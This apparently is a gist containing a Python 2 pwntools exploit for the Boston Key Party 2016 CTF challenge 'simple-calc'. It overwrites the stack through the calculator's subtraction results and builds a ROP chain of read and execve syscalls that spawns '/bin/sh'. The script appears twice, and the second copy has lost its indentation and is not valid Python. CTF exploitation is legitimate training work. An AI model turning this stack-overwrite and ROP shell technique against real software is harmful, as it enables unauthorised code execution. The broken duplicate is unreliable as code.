Tosainu · March 2, 2017 07:33
diff --git a/exploit.py b/exploit.py
 #!/usr/bin/env python2

 # Boston Key Party CTF : simple-calc-5
 # https://github.com/ctfs/write-ups-2016/tree/master/boston-key-party-2016/pwn/simple-calc-5

 import numpy as np
 from pwn import *

 # gdb-peda$ x/20gx $rbp-0x40
 # 0x7fffffffdd90:	0x0000000000000001	0x0000000000000001
 # 0x7fffffffdda0:	0x00007fffffffdeb8	0x0000000000401c77
 # 0x7fffffffddb0:	0x00000000004002b0	0x0000000a00000001
 # 0x7fffffffddc0:	0x00000000006c8bf0 <- buf	0x0000000200401c00
 # 0x7fffffffddd0:	0x00000000006c1018	0x000000000040176c <- return addr
 # 0x7fffffffdde0:	0x0000000000000000	0x0000000100000000
 # 0x7fffffffddf0:	0x00007fffffffdeb8	0x0000000000401383
 # 0x7fffffffde00:	0x00000000004002b0	0x7215c023ec079001
 # 0x7fffffffde10:	0x0000000000000000	0x0000000000401c00
 # 0x7fffffffde20:	0x0000000000401c90	0x0000000000000000
 offset_return_addr = 0x7fffffffddd8 - 0x7fffffffdd90

 addr_bss = 0x0000000006c2c40

 # ROP gadgets
 addr_pop_rax_ret = 0x0044db34 # 0x0044db34: pop rax ; ret  ;  (8 found)
 addr_pop_rdi_ret = 0x00401b73 # 0x00401b73: pop rdi ; ret  ;  (163 found)
 addr_pop_rsi_ret = 0x00401c87 # 0x00401c87: pop rsi ; ret  ;  (52 found)
 addr_pop_rdx_ret = 0x00437a85 # 0x00437a85: pop rdx ; ret  ;  (2 found)
 addr_syscall_ret = 0x004648e5 # 0x004648e5: syscall  ; ret  ;  (5 found)

 r = process('./b28b103ea5f1171553554f0127696a18c6d2dcf7')

 # Options Menu: 
 #  [1] Addition.
 #  [2] Subtraction.
 #  [3] Multiplication.
 #  [4] Division.
 #  [5] Save and Exit.
 # => 

 def choose_action(n):
    r.recvuntil('[5] Save and Exit.\n=> ')
    r.sendline(str(n))

 def calc(n, x, y):
    choose_action(n)
    r.recvuntil('Integer x: ')
    r.sendline(str(x))
    r.recvuntil('Integer y: ')
    r.sendline(str(y))
    r.recvuntil(' y is ')
    log.success('writing success! : 0x%x' % int(r.recvuntil('.')[:-1]))

 def write_value_32(x):
    if np.int32(x) >= 0:
        calc(2, np.int32(x) + 0x28, 0x28)
    else:
        calc(2, 0x28, 0x28 - np.int32(x))

 def write_value_64(x):
    write_value_32(x & 0xffffffff)
    write_value_32((x & 0xffffffff00000000) >> 32)

 r.recvuntil('Expected number of calculations: ')
 r.sendline(str((offset_return_addr / 4) + 100))

 # zero-fill
 for i in xrange(offset_return_addr / 4):
    write_value_32(0)

 # ROP
 rop = [
        # read(0, addr_bss, 0x1000)
        addr_pop_rax_ret, 0,
        addr_pop_rdi_ret, 0,
        addr_pop_rsi_ret, addr_bss,
        addr_pop_rdx_ret, 0x1000,
        addr_syscall_ret,
        # execve(addr_bss, addr_bss + 8, 0)
        addr_pop_rax_ret, 0x3b,
        addr_pop_rdi_ret, addr_bss,
        addr_pop_rsi_ret, addr_bss + 8,
        addr_pop_rdx_ret, 0,
        addr_syscall_ret
 ]
 for i in rop:
    write_value_64(i)

 choose_action(5)

 buf = ''
 buf += '/bin/sh'
 buf += '\x00' * (8 - len(buf))
 buf += p64(addr_bss)
 buf += p64(0)
 r.send(buf)

 r.interactive()
	#!/usr/bin/env python2

	# Boston Key Party CTF : simple-calc-5
	# https://github.com/ctfs/write-ups-2016/tree/master/boston-key-party-2016/pwn/simple-calc-5

	import numpy as np
	from pwn import *

	# gdb-peda$ x/20gx $rbp-0x40
	# 0x7fffffffdd90: 0x0000000000000001 0x0000000000000001
	# 0x7fffffffdda0: 0x00007fffffffdeb8 0x0000000000401c77
	# 0x7fffffffddb0: 0x00000000004002b0 0x0000000a00000001
	# 0x7fffffffddc0: 0x00000000006c8bf0 <- buf 0x0000000200401c00
	# 0x7fffffffddd0: 0x00000000006c1018 0x000000000040176c <- return addr
	# 0x7fffffffdde0: 0x0000000000000000 0x0000000100000000
	# 0x7fffffffddf0: 0x00007fffffffdeb8 0x0000000000401383
	# 0x7fffffffde00: 0x00000000004002b0 0x7215c023ec079001
	# 0x7fffffffde10: 0x0000000000000000 0x0000000000401c00
	# 0x7fffffffde20: 0x0000000000401c90 0x0000000000000000
	offset_return_addr = 0x7fffffffddd8 - 0x7fffffffdd90

	addr_bss = 0x0000000006c2c40

	# ROP gadgets
	addr_pop_rax_ret = 0x0044db34 # 0x0044db34: pop rax ; ret ; (8 found)
	addr_pop_rdi_ret = 0x00401b73 # 0x00401b73: pop rdi ; ret ; (163 found)
	addr_pop_rsi_ret = 0x00401c87 # 0x00401c87: pop rsi ; ret ; (52 found)
	addr_pop_rdx_ret = 0x00437a85 # 0x00437a85: pop rdx ; ret ; (2 found)
	addr_syscall_ret = 0x004648e5 # 0x004648e5: syscall ; ret ; (5 found)

	r = process('./b28b103ea5f1171553554f0127696a18c6d2dcf7')

	# Options Menu:
	# [1] Addition.
	# [2] Subtraction.
	# [3] Multiplication.
	# [4] Division.
	# [5] Save and Exit.
	# =>

	def choose_action(n):
	r.recvuntil('[5] Save and Exit.\n=> ')
	r.sendline(str(n))

	def calc(n, x, y):
	choose_action(n)
	r.recvuntil('Integer x: ')
	r.sendline(str(x))
	r.recvuntil('Integer y: ')
	r.sendline(str(y))
	r.recvuntil(' y is ')
	log.success('writing success! : 0x%x' % int(r.recvuntil('.')[:-1]))

	def write_value_32(x):
	if np.int32(x) >= 0:
	calc(2, np.int32(x) + 0x28, 0x28)
	else:
	calc(2, 0x28, 0x28 - np.int32(x))

	def write_value_64(x):
	write_value_32(x & 0xffffffff)
	write_value_32((x & 0xffffffff00000000) >> 32)

	r.recvuntil('Expected number of calculations: ')
	r.sendline(str((offset_return_addr / 4) + 100))

	# zero-fill
	for i in xrange(offset_return_addr / 4):
	write_value_32(0)

	# ROP
	rop = [
	# read(0, addr_bss, 0x1000)
	addr_pop_rax_ret, 0,
	addr_pop_rdi_ret, 0,
	addr_pop_rsi_ret, addr_bss,
	addr_pop_rdx_ret, 0x1000,
	addr_syscall_ret,
	# execve(addr_bss, addr_bss + 8, 0)
	addr_pop_rax_ret, 0x3b,
	addr_pop_rdi_ret, addr_bss,
	addr_pop_rsi_ret, addr_bss + 8,
	addr_pop_rdx_ret, 0,
	addr_syscall_ret
	]
	for i in rop:
	write_value_64(i)

	choose_action(5)

	buf = ''
	buf += '/bin/sh'
	buf += '\x00' * (8 - len(buf))
	buf += p64(addr_bss)
	buf += p64(0)
	r.send(buf)

	r.interactive()